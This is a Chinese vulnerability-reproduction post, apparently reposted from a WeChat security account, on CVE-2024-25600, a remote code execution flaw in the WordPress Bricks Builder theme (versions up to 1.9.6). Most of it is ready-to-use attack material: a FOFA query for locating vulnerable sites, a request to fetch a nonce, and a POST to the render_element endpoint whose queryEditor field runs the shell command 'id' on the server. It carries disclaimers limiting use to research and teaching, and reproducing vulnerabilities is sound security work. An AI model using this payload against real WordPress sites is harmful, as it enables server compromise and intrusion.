免责声明:文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。如有侵权烦请告知,我会立即删除并致歉。谢谢!
一:漏洞描述
Bricks Builder是一款面向WordPress网站建设的可视化编辑器,使用简单、功能强大。它提供了多种布局和预设模板,可以帮助用户快速创建专业、美观的网站。该产品存在远程代码执行漏洞。
二:漏洞影响版本
Bricks Builder <= 1.9.6
三:网络空间测绘查询
fofa:body="/wp-content/themes/bricks/"
四:漏洞复现
POC1:
GET / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip
获取网站nonce值(网站nonce值是一个用于WordPress站点安全性的一次性令牌。"Nonce"代表"Number used Once",即一次性数字。在WordPress中,nonce值通常用于确保表单提交的安全性,以防止跨站请求伪造(CSRF)攻击。每个nonce值只能在特定的操作和时间段内使用,一旦使用过后就会失效。)
POC2:
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip
{
"postId": "1",
"nonce": "上一步获取的nonce值",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}
五:批量检测
原文始发于微信公众号(Amica安全攻防):漏洞复现-WordPres Bricks Builder RCE(CVE-2024-25600)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论